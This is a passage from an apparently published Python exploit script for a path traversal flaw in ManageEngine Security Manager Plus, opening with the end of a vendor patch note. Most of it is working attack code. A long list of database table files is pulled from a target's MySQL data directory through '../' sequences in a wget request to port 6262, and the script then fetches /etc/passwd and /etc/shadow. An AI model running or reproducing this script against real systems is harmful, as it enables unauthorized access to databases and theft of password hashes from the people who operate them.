# 3. Copy the extracted .jar files to <SMP-HOME>lib directory (e.g., C:AdventNetSecurityManagerlib). [Overwrite the existing jar files and do not rename them]
# 4. Start the SMP service.
#+——————————————————————————————————————————–+

import os, sys

if (len(sys.argv) != 2):
    print ""
    print "[*] Security Manager Plus Path Traversal Exploit – xistence (xistence<[at]>0x90.nl) – 2012-05-29"
    print ""
    print "[*] Usage: secman-path.py <RHOST>"
    print "[*] I.e.:  ./secman-path.py www.manageengine.com"
    print "[*]"
    print "[*] RHOST = Remote Host which runs Security Manager Plus"
    print ""
    print ""
    exit(0)

rhost = sys.argv[1]


dbFiles = [‘StatusPropagateCriteria.frm’, ‘UserPatchComment.frm’, ‘I18nLanguageCountry.frm’, ‘Udef_Class_Range.frm’, ‘AaaUserContactInfo.frm’, ‘JoinTable.frm’, ‘GlobalCredential.frm’, ‘PMWinOS.frm’, ‘SysDetails.frm’, ‘AaaRole.frm’, ‘Time_Expressions.frm’, ‘DCSupportedApplications.frm’, ‘ACSQLString.frm’, ‘DeviceInventoryItems.frm’, ‘ACFeedBackProperties.frm’, ‘AaaPasswordHint.frm’, ‘AllowedValues.frm’, ‘Integral_Agg_Vars.frm’, ‘ACCountSQLString.frm’, ‘AaaServicePasswordRule.frm’, ‘ACCacheConfig.frm’, ‘AaaOrgDetail.frm’, ‘Array_List.frm’, ‘ViewCustomizer.frm’, ‘DeviceAuditInfo.frm’, ‘AaaAccountOwner.frm’, ‘DeviceToServicePack.frm’, ‘MSPMDependencyServicePack.frm’, ‘NENetwork.frm’, ‘ACUserFilterGroup.frm’, ‘WeeklyVulnID.frm’, ‘RegistryChanges.frm’, ‘PMPatchType.frm’, ‘NetworkTopology.frm’, ‘VulnerabilityScanDetails.frm’, ‘AaaAccSessionProp.frm’, ‘Int_Expr_To_Int.frm’, ‘JoinRelCriteria.frm’, ‘AaaModuleService.frm’, ‘ClientServiceProviders.frm’, ‘PCIQuery.frm’, ‘Upd_Row_Task_Template.frm’, ‘JoinCriteria.frm’, ‘LinuxAppGroup.frm’, ‘Start_End_Count.frm’, ‘OpenPorts.frm’, ‘DevicePatchTaskInput.frm’, ‘Free5IPs.frm’, ‘Int_DataObj_Expr.frm’, ‘Pattern_Variables.frm’, ‘DevicePatchStatusAuditInfo.frm’, ‘Email_Message.frm’, ‘TestReport.frm’, ‘ACLink.frm’, ‘Decimal_DataObj_Vars.frm’, ‘IPInterfaceNetwork.frm’, ‘ACUserClientState.frm’, ‘ScanPolicy.frm’, ‘OfficeMediaLocation.frm’, ‘ServicePackStoreAuditInfo.frm’, ‘PMScanVulDetails.frm’, ‘Iter_DataObj_Task.frm’, ‘PatchGroup.frm’, ‘Bool_Str_Dataobj_Expr.frm’, ‘OracleErrorCode.frm’, ‘SystemInfo.frm’, ‘Upd_DataObj_Var_Task.frm’, ‘BulletinDatastore.frm’, ‘SmtpConfiguration.frm’, ‘AaaOrgUser.frm’, ‘PMScheduledTaskDetails.frm’, ‘AaaOrgPostalAddr.frm’, ‘User_Def_Char_Class.frm’, ‘FileHandler.frm’, ‘AaaService.frm’, ‘ACAjaxFormOption.frm’, ‘ScheduleScanTaskInput.frm’, ‘ColumnDetails.frm’, ‘Boolean_Variables.frm’, ‘ACElement.frm’, ‘ACViewToGroupMapping.frm’, ‘DeviceToPatch.frm’, ‘Int_Const_Opr_Expr.frm’, ‘AaaPamModuleOption.frm’, ‘GroupVulnerabilities.frm’, ‘Pattern_Expressions.frm’, ‘GroupCompNotification.frm’, ‘MSCommand.frm’, ‘ACContextHelp.frm’, ‘Rules_To_Statements.frm’, ‘String_Matcher_Group.frm’, ‘DeviceToMSSoftware.frm’, ‘Task_Owner.frm’, ‘AaaMethodParams.frm’, ‘IPv4Address.frm’, ‘I18nLocalMsg.frm’, ‘Theme.frm’, ‘Repair.frm’, ‘Num_Const_Opr_Expr.frm’, ‘ACParams.frm’, ‘AaaTableUpdatePermission.frm’, ‘PatchDetectionCheck.frm’, ‘Templates_To_Relvars.frm’, ‘WindowsUsers.frm’, ‘MSRegChg.frm’, ‘NetworkDomainInfo.frm’, ‘ActiveDirectoryInfo.frm’, ‘Udef_Expr_Opr_Expr.frm’, ‘ScheduledReports.frm’, ‘UpdateDefinition.frm’, ‘GroupTicNotification.frm’, ‘ResourceFalsePositiveVulns.frm’, ‘FolderChanges.frm’, ‘WebViewConfig.frm’, ‘PMOfficeEditionType.frm’, ‘ACClientProps.frm’, ‘ACFilterConfigList.frm’, ‘EPMTaskInput.frm’, ‘AdditionalViewParams.frm’, ‘Quotation.frm’, ‘Str_Expr_To_Str.frm’, ‘bla.py’, ‘Network.frm’, ‘WindowsGroups.frm’, ‘ACTableFilterListRel.frm’, ‘PMTaskDetails.frm’, ‘LatestResourceScans.frm’, ‘Loop_Task_Template.frm’, ‘YSeriesColumn.frm’, ‘AaaAccOldPassword.frm’, ‘ConstituentTable.frm’, ‘FalsePositiveTestCase.frm’, ‘AaaOrganization.frm’, ‘PatchStoreLocation.frm’, ‘Print_Log_RelVars.frm’, ‘DeviceTaskInput.frm’, ‘PdfViewConfig.frm’, ‘Rules.frm’, ‘ProductDetectionCheck.frm’, ‘TreeQuery.frm’, ‘WebUIComponent.frm’, ‘AaaAce.frm’, ‘Pointers_In_Path.frm’, ‘NetworkDnsInfo.frm’, ‘LinuxPackageDependency.frm’, ‘UserNamePassword.frm’, ‘ManagedResource.frm’, ‘ProfileGroupMap.frm’, ‘ScanAddressGroup.frm’, ‘Default_Task_Conf.frm’, ‘AaaAccBadLoginStatus.frm’, ‘Pattern_Template_Vars.frm’, ‘PatchApplicableDetails.frm’, ‘NEComponent.frm’, ‘FKColumnDefinition.frm’, ‘Str_Deriv_Int_Vars.frm’, ‘Par_Char_Class_Expr.frm’, ‘Bool_Num_Comp_Decimal.frm’, ‘PatchDependencyCheck.frm’, ‘Logger.frm’, ‘Email_CC_Address.frm’, ‘MSAffectedServicePack.frm’, ‘AaaUserStatus.frm’, ‘DownloadFiles.frm’, ‘AuditSeverityLevel.frm’, ‘JavaScriptAction.frm’, ‘HTTPDirList.frm’, ‘AaaOrgStatus.frm’, ‘Templates.frm’, ‘OSLanguage.frm’, ‘TablesInTree.frm’, ‘TestCasePattern.frm’, ‘ValidationFiles.frm’, ‘ReverseDNSEntries.frm’, ‘CC_Address.frm’, ‘PortGroup.frm’, ‘DeviceConfigTaskInput.frm’, ‘Time_Operator_Delta.frm’, ‘AuditLevel.frm’, ‘AdventNetErrorCode.frm’, ‘AaaUserTwoFactorDetails.frm’, ‘PMSystemConfig.frm’, ‘TableDSMap.frm’, ‘DeviceToInventory.frm’, ‘PatchDetails.frm’, ‘VulnerabilityReference.frm’, ‘AaaLogin.frm’, ‘ModuleContext.frm’, ‘AuditResultProperty.frm’, ‘MSFile.frm’, ‘PatchGroupTaskInput.frm’, ‘Handler.frm’, ‘Numeric_Expressions.frm’, ‘Module.frm’, ‘DeviceConfigAuditInfo.frm’, ‘Cr_DataObj_Task.frm’, ‘PersonalizedViewMap.frm’, ‘ACPageLengthConfig.frm’, ‘ResourceScanStatus.frm’, ‘Decimal_Variables.frm’, ‘AaaAccSession.frm’, ‘PersonalityConfiguration.frm’, ‘Bool_Str_Comp_Str.frm’, ‘MemoryInfo.frm’, ‘AaaPasswordRule.frm’, ‘Workflow_Templates.frm’, ‘String_DataObj_Vars.frm’, ‘DefaultTheme.frm’, ‘FolderBaseline.frm’, ‘RemoteCommands.frm’, ‘IPv6Address.frm’, ‘AaaRoleCategory.frm’, ‘Ext_Task_Api_Loc.frm’, ‘ModeSpecificServiceProviders.frm’, ‘TestCaseCGIScript.frm’, ‘SystemTemplateHandler.frm’, ‘I18nCurrentVersion.frm’, ‘Expressions.frm’, ‘MSRegKey.frm’, ‘DeviceConfig.frm’, ‘Inner_Join.frm’, ‘Address.frm’, ‘UsbInfo.frm’, ‘IPNetwork.frm’, ‘DiscoveredDomains.frm’, ‘ResourceRegValues.frm’, ‘Projection_Operator.frm’, ‘Udef_Char_Cls_Expr.frm’, ‘Integral_Variables.frm’, ‘To_Address.frm’, ‘Decimal_Obj_Expr.frm’, ‘Numeric_Rank_Vars.frm’, ‘ServerDetails.frm’, ‘WF_Task_Variables.frm’, ‘AuditRecord.frm’, ‘Menu.frm’, ‘UserPreferences.frm’, ‘OmitForScan.frm’, ‘ConfFile.frm’, ‘ProfileResourceMap.frm’, ‘AaaUserConfigRecord.frm’, ‘Pattern_DataObj_Vars.frm’, ‘Concat_Task_Template.frm’, ‘DeviceInfo.frm’, ‘MSPatch.frm’, ‘Bool_Num_Comp_Const.frm’, ‘Template_Constants.frm’, ‘While_Loop_Tasks.frm’, ‘Task_Input.frm’, ‘SelectTable.frm’, ‘MSServicePack.frm’, ‘Workflow_Instances.frm’, ‘WorkEngine_Config.frm’, ‘SingleTestCaseExecutor.frm’, ‘PMScheduledJob.frm’, ‘ACTabChildConfig.frm’, ‘NewLinuxAdvisory.frm’, ‘AaaAuthorizedRole.frm’, ‘Instances.frm’, ‘Subject_Keys.frm’, ‘Boundary_Matchers.frm’, ‘AaaPamModule.frm’, ‘AuditResourceProp.frm’, ‘WMITestCasePattern.frm’, ‘IndexDefinition.frm’, ‘Views_PIDX.frm’, ‘Selection_Operator.frm’, ‘CmdFilesToPush.frm’, ‘PKDefinition.frm’, ‘PMSPPushCounter.frm’, ‘ServiceBanner.frm’, ‘AaaAccHttpSession.frm’, ‘AaaTablePermission.frm’, ‘AllowedPattern.frm’, ‘LinuxExtPackage.frm’, ‘Workflow_Statements.frm’, ‘UniqueKeyDefinition.frm’, ‘Working_Hours.frm’, ‘DeviceToPackageList.frm’, ‘Architecture.frm’, ‘PMDeviceToSPInfo.frm’, ‘ChangeMonitorTasks.frm’, ‘AaaTableReadPermission.frm’, ‘NegateResult.frm’, ‘ViewConfiguration.frm’, ‘CustomViewServiceProviders.frm’, ‘Decimal_Agg_Vars.frm’, ‘KeyboardInfo.frm’, ‘Time_Template_Vars.frm’, ‘Task_Conf.frm’, ‘PMEntryPerPage.frm’, ‘DriveInfo.frm’, ‘Vulnerability.frm’, ‘Criteria.frm’, ‘AffectedProduct.frm’, ‘TestCaseCommands.frm’, ‘Reg_Expr_Split_List.frm’, ‘ACPSConfiguration.frm’, ‘Relations_In_Path.frm’, ‘FileCheckDetail.frm’, ‘PortGroupRange.frm’, ‘DeviceToPatchStatus.frm’, ‘AaaAccSessionAudit.frm’, ‘SeverityNode.frm’, ‘Message_Keys.frm’, ‘Decimal_DataObj_Expr.frm’, ‘ACElementAttr.frm’, ‘ProcessorInfo.frm’, ‘Template_Variables.frm’, ‘Relations.frm’, ‘AaaEnvironmentEntry.frm’, ‘AaaAccOwnerProfile.frm’, ‘AaaPostalAddress.frm’, ‘NewPatchInfo.frm’, ‘Replace_Reg_Expr_Str.frm’, ‘ACJSOption.frm’, ‘Int_Obj_Expr.frm’, ‘Mail_Server.frm’, ‘TestCaseHTTPURLCheck.frm’, ‘TestCase.frm’, ‘SelectSQLString.frm’, ‘NetworkElement.frm’, ‘AaaImpliedByTableColumn.frm’, ‘IPInterface.frm’, ‘PMMessage.frm’, ‘Update_Index_Vars.frm’, ‘UINavigationConfig.frm’, ‘Workflow_Unit_PIDX.frm’, ‘VulnerabilityCategory.frm’, ‘String_Template_Vars.frm’, ‘DataSource.frm’, ‘PMSPLocationExtn.frm’, ‘ConstraintDefinition.frm’, ‘Fk_Paths.frm’, ‘TemplateFiles.frm’, ‘I18nUserTranslatorMap.frm’, ‘Boolean_Template_Vars.frm’, ‘ACFilterConfig.frm’, ‘TmpViewCriteria.frm’, ‘Rename_Operator.frm’, ‘PdfUIComponent.frm’, ‘Str_Expr_Opr_Expr.frm’, ‘Error_Data.frm’, ‘ACFilterGroup.frm’, ‘MSFileChg.frm’, ‘MSBulletinComment.frm’, ‘Scheduled_Task.frm’, ‘ScheduledScan.frm’, ‘Schedule.frm’, ‘Boolean_Constants.frm’, ‘ReportTemplate.frm’, ‘ACCriteria.frm’, ‘DominantTableConfig.frm’, ‘AuditNotif
yCriteria.frm’, ‘BulkTestCases.frm’, ‘PMTaskScanMapper.frm’, ‘Attachment_Input.frm’, ‘I18nPublicLocalMsg.frm’, ‘Pre_Def_Char_Class.frm’, ‘I18nVersion.frm’, ‘DeviceInventoryTypes.frm’, ‘Configuration.frm’, ‘MSRegChange.frm’, ‘SelectQuery.frm’, ‘LinuxPatchDependency.frm’, ‘AAARadiusConfig.frm’, ‘Num_Decimal_Opr_Expr.frm’, ‘DiscoveredHosts.frm’, ‘Str_DataObj_Expr.frm’, ‘Instance_Data.frm’, ‘ACTableViewConfig.frm’, ‘LinuxCheckDetail.frm’, ‘OpenViewInContentArea.frm’, ‘CiscoTestCasePattern.frm’, ‘Group_Templates.frm’, ‘Bool_Num_Dataobj_Expr.frm’, ‘ResourceWMITestResults.frm’, ‘MemoryModuleInfo.frm’, ‘ServiceVulnerability.frm’, ‘MSBulletin.frm’, ‘Num_Expr_Opr_Decimal.frm’, ‘Boolean_DataObj_Vars.frm’, ‘ACTableLayoutChildConfig.frm’, ‘Bool_Expr_Terms.frm’, ‘DefService.frm’, ‘AIPLocation.frm’, ‘ACNavigationConfiguration.frm’, ‘Tasks_To_Exceptions.frm’, ‘MSSupercededBulletin.frm’, ‘ViewConfiguration_PIDX.frm’, ‘I18nTranslator.frm’, ‘Proj_Opr_Output.frm’, ‘PortGroupPorts.frm’, ‘ResourceSch.frm’, ‘PatchDeployDependency.frm’, ‘DataObj_Variables.frm’, ‘Product.frm’, ‘UIComponent_PIDX.frm’, ‘Time_Constants.frm’, ‘Update_Template_Vars.frm’, ‘BulkTestCaseExecutor.frm’, ‘AddressGroupRange.frm’, ‘VulnerabilityGroup.frm’, ‘Commit_DataObj_Task.frm’, ‘MSAvailableSP.frm’, ‘ReportServiceFilter.frm’, ‘NEInterfaceDetails.frm’, ‘ResourceSoftwareList.frm’, ‘ACGridLayoutChildConfig.frm’, ‘Str_Obj_Expr.frm’, ‘ChartProperty.frm’, ‘FKDefinition.frm’, ‘AaaContactInfo.frm’, ‘ACLinkParams.frm’, ‘ACPanelElement.frm’, ‘Int_Expr_Opr_Const.frm’, ‘Bool_Composed_Expr.frm’, ‘TableDetails.frm’, ‘DeviceRebootStatus.frm’, ‘ReportType.frm’, ‘Bool_Time_Comp_Time.frm’, ‘AxisColumn.frm’, ‘AdvisoryPatchDependency.frm’, ‘TmpColumnRenderer.frm’, ‘ResourceConfiguration.frm’, ‘AaaAccount.frm’, ‘Out_Var_Instances.frm’, ‘MSPMRegChange.frm’, ‘DeviceToScanInfo.frm’, ‘RelationalCriteria.frm’, ‘ChartPropKey.frm’, ‘MSProductFamily.frm’, ‘TypeMatchCriteria.frm’, ‘Message_Templates.frm’, ‘LatestCompletedAGScans.frm’, ‘Checks.frm’, ‘I18nMessage.frm’, ‘WebMenuItem.frm’, ‘ACFormConfig.frm’, ‘Iter_Table_Task.frm’, ‘DeviceOfficeEditionType.frm’, ‘ScheduledTask_Retry.frm’, ‘Integral_Row_Count.frm’, ‘Bulletin.frm’, ‘ViewDataTableMapping.frm’, ‘MenuAndMenuItem.frm’, ‘PMPatchEXTNMaster.frm’, ‘FeatureParams.frm’, ‘Template_Data.frm’, ‘Workflow_Task.frm’, ‘Bool_Time_Comp_Const.frm’, ‘Workflow_Template_Task.frm’, ‘Print_Log_Expr.frm’, ‘AaaMethodPermission.frm’, ‘Num_Expr_Opr_Const.frm’, ‘SeqGenState.frm’, ‘ScanJobMapper.frm’, ‘ServerStatus.frm’, ‘DeviceCredential.frm’, ‘Relvars_To_Views.frm’, ‘Group_Count.frm’, ‘TCRegistryValueCheck.frm’, ‘PMDeviceToPatch.frm’, ‘DeviceGlobalCredential.frm’, ‘Default_Task_Input.frm’, ‘MSPatchComment.frm’, ‘ServerServiceProviders.frm’, ‘Inner_Join_Attribs.frm’, ‘ThreadPool.frm’, ‘Print_Log.frm’, ‘AaaPermission.frm’, ‘ScanInputsForDisplay.frm’, ‘ACFunctionColumns.frm’, ‘LinuxAdvisory.frm’, ‘MySQLErrorCode.frm’, ‘Exceptions.frm’, ‘SystemUserComment.frm’, ‘String_List.frm’, ‘NetworkInfo.frm’, ‘DeviceToLinuxOS.frm’, ‘AssetGroupCred.frm’, ‘MonitorInfo.frm’, ‘Fk_Pointers.frm’, ‘ACStringConstant.frm’, ‘MSProductFamilyDetail.frm’, ‘String_Variables.frm’, ‘CrackedUserNamePassword.frm’, ‘Coll_Iterat_Template.frm’, ‘TmpViewDetails.frm’, ‘AaaAccPassword.frm’, ‘HardDiskInfo.frm’, ‘ACColumnConfiguration.frm’, ‘Relvars.frm’, ‘ChartPropertySet.frm’, ‘Periodic.frm’, ‘LinuxPatch.frm’, ‘Email_Task_Input.frm’, ‘ServicePackTaskInput.frm’, ‘Resource_Location.frm’, ‘MSSQLCheckQuery.frm’, ‘TCHTTPFileGrep.frm’, ‘Email_To_Address.frm’, ‘AaaUserProperty.frm’, ‘ScanVulnGroup.frm’, ‘UIComponent.frm’, ‘InventoryHardware.frm’, ‘ACFilterList.frm’, ‘Schedule_View.frm’, ‘ManagedStateHolder.frm’, ‘Paths.frm’, ‘WmiErrorCode.frm’, ‘Trans_Closure_Attributes.frm’, ‘PMScanInfo.frm’, ‘SPDeployDependency.frm’, ‘AuditOperProperty.frm’, ‘Simple_Class_Expr.frm’, ‘ChartViewConfig.frm’, ‘Decimal_Expr_To_Dc.frm’, ‘AuditUserProperty.frm’, ‘BeanInterceptor.frm’, ‘DeviceRebootPending.frm’, ‘DataObj_Var_Tables.frm’, ‘MonitorProfiles.frm’, ‘AddressGroup.frm’, ‘PMPatchPushCounter.frm’, ‘ACColumnConfigurationList.frm’, ‘Pointer_Fk_Attributes.frm’, ‘MSSoftwareCheck.frm’, ‘Schedule_Audit.frm’, ‘NEInterface.frm’, ‘Integral_Template_Vars.frm’, ‘ACDropDown.frm’, ‘MouseInfo.frm’, ‘OperationAuditRecord.frm’, ‘Cr_Row_Task_Template.frm’, ‘Inner_Join_Tables.frm’, ‘DeviceGroup.frm’, ‘Forward.frm’, ‘ResourceDeviceMapper.frm’, ‘ACAjaxForm.frm’, ‘I18nVersionMessage.frm’, ‘Location.frm’, ‘Str_Const_Opr_Expr.frm’, ‘Resources_PIDX.frm’, ‘AntiVirusInfo.frm’, ‘UnavailableHosts.frm’, ‘TestCaseVulnerability.frm’, ‘AaaPamConf.frm’, ‘ReportMailSettings.frm’, ‘BeanProperties.frm’, ‘MSComment.frm’, ‘Pattern_To_Str_Expr.frm’, ‘ObjectIdentifierColumns.frm’, ‘ACDropDownParams.frm’, ‘AuditTableConfig.frm’, ‘OfficeDeploymentPolicy.frm’, ‘ScanInputs.frm’, ‘ACAjaxOptions.frm’, ‘FileChanges.frm’, ‘TableViewSortColumn.frm’, ‘Bool_Decimal_Dataobj_Expr.frm’, ‘I18nCreatedBy.frm’, ‘Time_Expr_To_Time.frm’, ‘ACEmailAddress.frm’, ‘PMMSServicePackInfo.frm’, ‘ScanRange.frm’, ‘Print_Task_Relvar.frm’, ‘ProfileMonitorMap.frm’, ‘Print_Task.frm’, ‘String_Expressions.frm’, ‘AaaDisableAuth.frm’, ‘PatchGroupResourceMap.frm’, ‘db.opt’, ‘DeviceSPStatusAuditInfo.frm’, ‘ACIntegerConstant.frm’, ‘AddressGroupHosts.frm’, ‘TaskEngine_Task.frm’, ‘ACTemplateHandler.frm’, ‘InventoryService.frm’, ‘StatusUpdateCriteria.frm’, ‘SelectColumn.frm’, ‘CVEDetail.frm’, ‘RemReportConf.frm’, ‘Parent_Class_Expr.frm’, ‘Relvars_To_Tables.frm’, ‘DeviceToGroup.frm’, ‘SoftwareList.frm’, ‘ProxyConfiguration.frm’, ‘Boolean_Expressions.frm’, ‘PatchSeverityImage.frm’, ‘DeviceGroupTaskInput.frm’, ‘ApplicationVulnerability.frm’, ‘MSPMInstallSequence.frm’, ‘SQinTreeQuery.frm’, ‘PMAlternateLocation.frm’, ‘MSFileChange.frm’, ‘Quantifier_Operator.frm’, ‘Time_Variables.frm’, ‘AlarmStateHolder.frm’, ‘WMITestCaseExpression.frm’, ‘DiscoveryJobs.frm’, ‘AaaOrgContactUser.frm’, ‘Udef_Char_Cls_Const.frm’, ‘ResourceDisplayMapper.frm’, ‘AddressGroupResources.frm’, ‘Task_Templates.frm’, ‘Time_DataObj_Vars.frm’, ‘MSProduct.frm’, ‘Integral_Expressions.frm’, ‘ACFtpDetails.frm’, ‘PackageStoreLocation.frm’, ‘ThemeAttributesMapping.frm’, ‘Out_Template_Vars.frm’, ‘RegkeyCheckDetail.frm’, ‘ACInstantFeedBack.frm’, ‘Integral_DataObj_Vars.frm’, ‘Composite.frm’, ‘AaaOrgContactInfo.frm’, ‘Statements.frm’, ‘MenuItem.frm’, ‘Num_Expr_Opr_Expr.frm’, ‘PMPatchLocationExtn.frm’, ‘Bool_Exists_Var.frm’, ‘ServicePackStoreLocation.frm’, ‘DeviceToPackageStatus.frm’, ‘ACMailConfig.frm’, ‘ScanTicNotification.frm’, ‘Bool_Neg_Expr.frm’, ‘MSMapping.frm’, ‘ReportRiskFilter.frm’, ‘TCServiceDependency.frm’, ‘Decimal_Template_Vars.frm’, ‘Attachment.frm’, ‘PMRegkeyCheckDetail.frm’, ‘AaaImpliedTableColumn.frm’, ‘TreeIdentifierColumns.frm’, ‘PatchStoreConfiguration.frm’, ‘ScanPortGroup.frm’, ‘NVaxApplication.frm’, ‘Bean.frm’, ‘Trans_Closure_Weights.frm’, ‘PMFileCheckDetail.frm’, ‘JoinColumns.frm’, ‘Iterat_Task_Template.frm’, ‘Discovery.frm’, ‘RangeValues.frm’, ‘OperatingSystem.frm’, ‘Email_Attachments.frm’, ‘Service.frm’, ‘DBAdapter.frm’, ‘PMProductFamily.frm’, ‘NotificationCriteria.frm’, ‘Pattern_To_Char_Expr.frm’, ‘AaaGenderHonorific.frm’, ‘Action.frm’, ‘ACRelationalCriteria.frm’, ‘PgSQLErrorCode.frm’, ‘PMPatchLocation.frm’, ‘Custom_Bool_Expr.frm’, ‘AaaTableAccessSPI.frm’, ‘AaaImpliedPermission.frm’, ‘Resources.frm’, ‘Patch.frm’, ‘MultiMediaInfo.frm’, ‘MSSupercededBy.frm’, ‘TableTemplateFiles.frm’, ‘SNMPCommunity.frm’, ‘PrinterInfo.frm’, ‘OSDisplayDetails.frm’, ‘UVHValues.frm’, ‘PatchGroupToAddressGroupMap.frm’, ‘TCsAfterPatchDetection.frm’, ‘Boolean_Reg_Expr.frm’, ‘Task_Instances.frm’, ‘DeviceProtocol.frm’, ‘AaaUserProfile.frm’, ‘ScanCompNotification.frm’, ‘Bool_Const_Comp_Str.frm’, ‘ServiceProperties.frm’, ‘TreeDefinition.frm’, ‘Bool_Set_Comp_Var.frm’, ‘Int_Expr_Opr_Expr.frm’, ‘TiledView.frm’, ‘Quantifier.frm’, ‘ResourceCompNotification.frm’, ‘TemplateViewParams.frm’, ‘ScanPMTaskMapper.frm’, ‘AaaRoleToCategory.frm’, ‘MsSQLErrorCode.frm’, ‘WMITestCaseCommands.frm’, ‘FalsePositiveVulns.frm’, ‘MSQNumber.frm’, ‘DiscoveryToResourceMapping.frm’, ‘AaaAccountStatus.frm’, ‘Time_Agg_Vars.frm’, ‘ACCVTabParentConfig.frm’, ‘AaaPasswordProfile.frm’, ‘ReportCategoryFilter.frm’,
 ‘Quantifier_Range.frm’, ‘AaaUserPostalAddr.frm’, ‘CustomHandler.frm’, ‘FileBaseline.frm’, ‘AuditConfig.frm’, ‘ResourceVulnerabilityDetails.frm’, ‘AaaAccAdminProfile.frm’, ‘PMSPLocation.frm’, ‘Trans_Closure_Operator.frm’, ‘ResourceTicNotification.frm’, ‘Bool_Str_Comp_Const.frm’, ‘Bool_Expr_With_Terms.frm’, ‘Java_Api.frm’, ‘SortColumn.frm’, ‘AaaTrustedRole.frm’, ‘C_Task_Apis.frm’, ‘PatchToGroup.frm’, ‘ScanStatus.frm’, ‘Calendar_Periodicity.frm’, ‘PhysicalDriveInfo.frm’, ‘AaaAccUserProfile.frm’, ‘ACGroupByColumns.frm’, ‘SoundCardInfo.frm’, ‘AuditConfigProperty.frm’, ‘ReportSeverityFilter.frm’, ‘ScanJobResources.frm’, ‘Str_Expr_Opr_Const.frm’, ‘Views.frm’, ‘ACUserPreference.frm’, ‘Trans_Closure_Weight_Expr.frm’, ‘PackageList.frm’, ‘I18nCurrUserLocale.frm’, ‘AaaPasswordStatus.frm’, ‘UpdateDeleteRows.frm’, ‘Calendar.frm’, ‘AaaSimplePermission.frm’, ‘CrackedSNMPCommunity.frm’, ‘DataObj_Var_Columns.frm’, ‘MSSeverity.frm’, ‘ACRendererConfiguration.frm’, ‘ACTableColumns.frm’, ‘PortInfo.frm’, ‘ExeReportConf.frm’, ‘Class_Expr_Opr_Expr.frm’, ‘Concat_Task_List.frm’, ‘AaaImpliedRole.frm’, ‘Expressions_PIDX.frm’, ‘RiskFactor.frm’, ‘ResourceCred.frm’, ‘TestCaseHTTPDir.frm’, ‘CustomViewConfiguration.frm’, ‘CredentialDescription.frm’, ‘RemoteTCExpression.frm’, ‘RepairReport.frm’, ‘Bool_Expr_Comp_Expr.frm’, ‘PatchTaskInput.frm’, ‘MSSupercededPatch.frm’, ‘ACClientEncProps.frm’, ‘I18nLocale.frm’, ‘ConfFileToModule.frm’, ‘Decimal_Expressions.frm’, ‘Print_Task_Expr.frm’, ‘Workflow_Unit.frm’, ‘ResourceApplication.frm’, ‘Email_Task.frm’, ‘VulnerabilityScan.frm’, ‘ACGridLayoutConfig.frm’, ‘AaaPassword.frm’, ‘AaaRoleOwner.frm’, ‘ACPSConfigList.frm’, ‘Del_Row_Task_Template.frm’, ‘AaaUser.frm’, ‘RebootPolicy.frm’, ‘TreeQueryIdentifierColumns.frm’, ‘WindowsServices.frm’, ‘ACFilter.frm’, ‘PatchStoreAuditInfo.frm’, ‘SB_Applications.frm’, ‘OperationType.frm’, ‘LatestResourceScanStatus.frm’, ‘MSPMFileChange.frm’, ‘LatestAGScans.frm’, ‘RegistryBaseline.frm’, ‘BookMark.frm’, ‘TmpViewColumn.frm’, ‘Char_Class_Expr.frm’, ‘WorkFlow_Type.frm’, ‘ScanVulnerabilityDetails.frm’, ‘ScanHosts.frm’]

for blah in dbFiles:
        print "[*] Downloading file: " + blah
        os.system("wget -q http://%s:6262/store?f=../mysql/data/securitymanager/%s -O %s" % (rhost, blah, blah))

os.system("wget http://%s:6262/store?f=../../../../../etc/passwd -O passwd" % rhost)
os.system("wget http://%s:6262/store?f=../../../../../etc/shadow -O shadow" % rhost)